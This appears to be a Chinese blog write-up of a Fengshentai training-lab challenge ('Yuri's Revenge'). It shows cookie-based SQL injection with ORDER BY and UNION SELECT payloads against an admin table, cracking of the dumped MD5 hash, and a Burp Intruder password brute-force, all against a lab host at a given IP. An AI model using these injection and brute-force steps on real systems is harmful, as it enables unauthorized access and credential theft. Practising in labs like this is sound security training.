封神台-第二章 尤里的复仇

1.
封神台-第二章 尤里的复仇任意选择一条新闻动态
封神台-第二章 尤里的复仇
2.
封神台-第二章 尤里的复仇

发现出现交互界面 url中id=170 存在注入点
3.判断字段数
?id=170+order+by+10
封神台-第二章 尤里的复仇

?id=170+order+by+11
封神台-第二章 尤里的复仇

4.使用modheader
封神台-第二章 尤里的复仇

直接在url中输入 报错
封神台-第二章 尤里的复仇

第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin
5.在url中输入http://59.63.200.79:8004/shownews.asp
封神台-第二章 尤里的复仇

没有报错,并且看到存在admin表,2.3.7.8.9处可以添加查询字段,可以输入username和password
6.重新构造modheader
封神台-第二章 尤里的复仇

2处显示 username admin
3处显示password b9a2a2b5dffb918c

7.password经过md5解密后
封神台-第二章 尤里的复仇

8.登录59.63.200.79:8004/admin
封神台-第二章 尤里的复仇

Username: admin
Password:welcome

突发奇想,虽然不正规 哈哈哈哈
假设已知后台登录登录网址为59.63.200.79:8004/admin
且用户名已知为admin
直接使用bp**密码

1.任意输入密码,抓包
封神台-第二章 尤里的复仇

2.发送至intruder
封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇
标记密码处
Payload处添加自己的密码本
封神台-第二章 尤里的复仇

这里调整线程数为10
封神台-第二章 尤里的复仇

可以显示结果为welcome
3.登录拿key

网络信息安全-ploto

相关文章:

  • 2022-12-23
  • 2021-09-29
  • 2021-11-17
  • 2021-07-28
  • 2021-09-03
  • 2022-01-08
  • 2021-10-23
猜你喜欢
  • 2021-10-22
  • 2021-07-27
  • 2022-12-23
  • 2021-04-05
  • 2021-08-02
  • 2021-05-08
  • 2021-05-22
相关资源
相似解决方案